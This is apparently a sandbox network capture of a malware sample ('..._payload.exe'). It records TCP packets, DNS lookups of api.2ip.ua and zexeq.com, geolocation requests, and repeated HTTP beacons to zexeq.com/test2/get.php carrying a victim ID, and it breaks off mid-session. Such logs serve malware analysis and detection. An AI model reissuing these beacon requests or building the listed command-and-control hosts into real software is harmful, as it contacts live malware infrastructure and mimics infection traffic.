                                                                                                                          Jan 16, 2024 00:41:00.978084087 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.978089094 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.978418112 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:00.978473902 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:00.981556892 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:01.022034883 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:01.472970009 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:01.473088980 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:01.473159075 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:01.477667093 CET49731443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:01.477678061 CET44349731172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.206746101 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.206984043 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.486532927 CET8049732175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.486634970 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.487109900 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.505781889 CET8049733175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.505906105 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.506186008 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.768572092 CET8049732175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.768655062 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.768733025 CET4973280192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.806804895 CET8049733175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:03.807022095 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:03.807075977 CET4973380192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:04.048137903 CET8049732175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:04.106853962 CET8049733175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:07.822959900 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:07.823054075 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:07.823144913 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:07.835408926 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:07.835448027 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.043272972 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.043380022 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.048804998 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.048842907 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.049257040 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.049324036 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.051383972 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.097913980 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591229916 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591322899 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.591398001 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591450930 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.591468096 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591511011 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.591521025 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.591561079 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.592253923 CET49734443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:08.592283010 CET44349734172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:08.808545113 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:08.886604071 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.120846987 CET8049735175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.120974064 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.121315002 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.184415102 CET8049736175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.184501886 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.184797049 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.485234022 CET8049736175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.485343933 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.485457897 CET4973680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:09.783704042 CET8049736175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:09.791928053 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:10.102770090 CET8049735175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:10.102838993 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:10.102992058 CET4973580192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:10.415308952 CET8049735175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.041045904 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.136635065 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.341816902 CET8049737175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.341955900 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.342257977 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.418817043 CET8049738175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.418924093 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.419260979 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.642679930 CET8049737175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.642767906 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.642889023 CET4973780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.701627970 CET8049738175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.701704025 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.706027985 CET4973880192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:15.943512917 CET8049737175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:15.987473965 CET8049738175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.116209984 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.116235018 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.116312981 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.125849009 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.125861883 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.332099915 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.332209110 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.338201046 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.338208914 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.338548899 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.338607073 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.341079950 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.385895014 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836150885 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836225986 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.836241007 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836337090 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.836344957 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836401939 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:16.836405039 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.836520910 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.838030100 CET49739443192.168.2.4172.67.139.220
                                                                                                                          Jan 16, 2024 00:41:16.838042021 CET44349739172.67.139.220192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:20.700923920 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:20.794480085 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:20.981084108 CET8049746175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:20.984493971 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:20.984824896 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.086405039 CET8049747175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.086525917 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.086894989 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.264380932 CET8049746175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.264462948 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.264666080 CET4974680192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.378422022 CET8049747175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.378515959 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.378604889 CET4974780192.168.2.4175.119.10.231
                                                                                                                          Jan 16, 2024 00:41:21.545272112 CET8049746175.119.10.231192.168.2.4
                                                                                                                          Jan 16, 2024 00:41:21.668096066 CET8049747175.119.10.231192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 16, 2024 00:40:57.863435030 CET | 52155 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2024 00:40:57.965809107 CET | 53 | 52155 | 1.1.1.1 | 192.168.2.4
Jan 16, 2024 00:41:00.737171888 CET | 53357 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2024 00:41:01.746212006 CET | 53357 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2024 00:41:02.745091915 CET | 53357 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2024 00:41:03.192943096 CET | 53 | 53357 | 1.1.1.1 | 192.168.2.4
Jan 16, 2024 00:41:03.193016052 CET | 53 | 53357 | 1.1.1.1 | 192.168.2.4
Jan 16, 2024 00:41:03.193098068 CET | 53 | 53357 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 16, 2024 00:40:57.863435030 CET | 192.168.2.4 | 1.1.1.1 | 0x885f | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:00.737171888 CET | 192.168.2.4 | 1.1.1.1 | 0x5674 | Standard query (0) | zexeq.com | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:01.746212006 CET | 192.168.2.4 | 1.1.1.1 | 0x5674 | Standard query (0) | zexeq.com | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:02.745091915 CET | 192.168.2.4 | 1.1.1.1 | 0x5674 | Standard query (0) | zexeq.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 16, 2024 00:40:57.965809107 CET | 1.1.1.1 | 192.168.2.4 | 0x885f | No error (0) | api.2ip.ua |  | 172.67.139.220 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:40:57.965809107 CET | 1.1.1.1 | 192.168.2.4 | 0x885f | No error (0) | api.2ip.ua |  | 104.21.65.24 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 175.119.10.231 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 210.182.29.70 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 95.158.162.200 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.181.24.133 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.119.84.112 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 196.188.169.138 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 109.175.29.39 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.192943096 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 123.140.161.243 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 175.119.10.231 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 210.182.29.70 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 95.158.162.200 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.181.24.133 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.119.84.112 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 196.188.169.138 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 109.175.29.39 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193016052 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 123.140.161.243 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 175.119.10.231 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 210.182.29.70 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 95.158.162.200 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.181.24.133 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 175.120.254.9 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.119.84.112 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 196.188.169.138 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 109.175.29.39 | A (IP address) | IN (0x0001) | false
Jan 16, 2024 00:41:03.193098068 CET | 1.1.1.1 | 192.168.2.4 | 0x5674 | No error (0) | zexeq.com |  | 123.140.161.243 | A (IP address) | IN (0x0001) | false
                                                                                                                          • api.2ip.ua
                                                                                                                          • zexeq.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 175.119.10.231 | 80 | 7568 | C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:03.487109900 CET | 137 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 175.119.10.231 | 80 | 7620 | C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:03.506186008 CET | 126 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 175.119.10.231 | 80 | 7568 | C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:09.121315002 CET | 137 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com
Jan 16, 2024 00:41:09.791928053 CET | 137 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 175.119.10.231 | 80 | 7620 | C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:09.184797049 CET | 126 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49737 | 175.119.10.231 | 80 | 7620 | C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:15.342257977 CET | 126 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49738 | 175.119.10.231 | 80 | 7568 | C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:15.419260979 CET | 137 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49746 | 175.119.10.231 | 80 | 7620 | C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:20.984824896 CET | 126 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49747 | 175.119.10.231 | 80 | 7568 | C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2024 00:41:21.086894989 CET | 137 | OUT | GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: zexeq.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49729 | 172.67.139.220 | 443 | 7476 | C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-01-15 23:40:58 UTC | 85 | OUT | GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
2024-01-15 23:40:58 UTC | 891 | IN | HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 23:40:58 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2T%2Bl36zn4%2BscfIepXqGkbRm75GUG3d483ifIfTX10QH2pYRB1A30kEnHGuVIiox54XJHE%2FDVGkL9WKOz4reIqViQCxnc%2BBwSKg4ajB2HsS1EXQVgS64wtkMsJ8YN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8461f78109985908-IAD
alt-svc: h3=":443"; ma=86400
2024-01-15 23:40:58 UTC | 433 | IN | Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-15 23:40:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49730 | 172.67.139.220 | 443 | 7568 | C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-01-15 23:41:00 UTC | 85 | OUT | GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
2024-01-15 23:41:00 UTC | 887 | IN | HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 23:41:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x1PB7KreZRQ6oPALKTRUmnvxps4X7Vq3NFXj2MfHl7O35Ttf98ZlOb3l0MkUSzXPFUnLnbjfUHoHh3TK4e3G%2BC9sooaV09n1lmwUfe027AhGAH1qr9xZzq1WmzB%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8461f78cbbde69ff-IAD
alt-svc: h3=":443"; ma=86400
2024-01-15 23:41:00 UTC | 433 | IN | Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
2024-01-15 23:41:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49731 | 172.67.139.220 | 443 | 7620 | C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-01-15 23:41:00 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
2024-01-15 23:41:01 UTC | 891 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:41:01 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JIKrkqa6W2%2F9RGpAzMBY%2BJGG6wWzc%2BM6yJSNuvY6kEGUxAFqPwrNDwJgW0D3kGfHPd2TFPZCsfNCoqgB4B%2FKcvtToRjgSerpCcFsKTa4tCRRY06Q7YxlYu07gobH"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f79238a32027-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
2024-01-15 23:41:01 UTC | 433 | IN
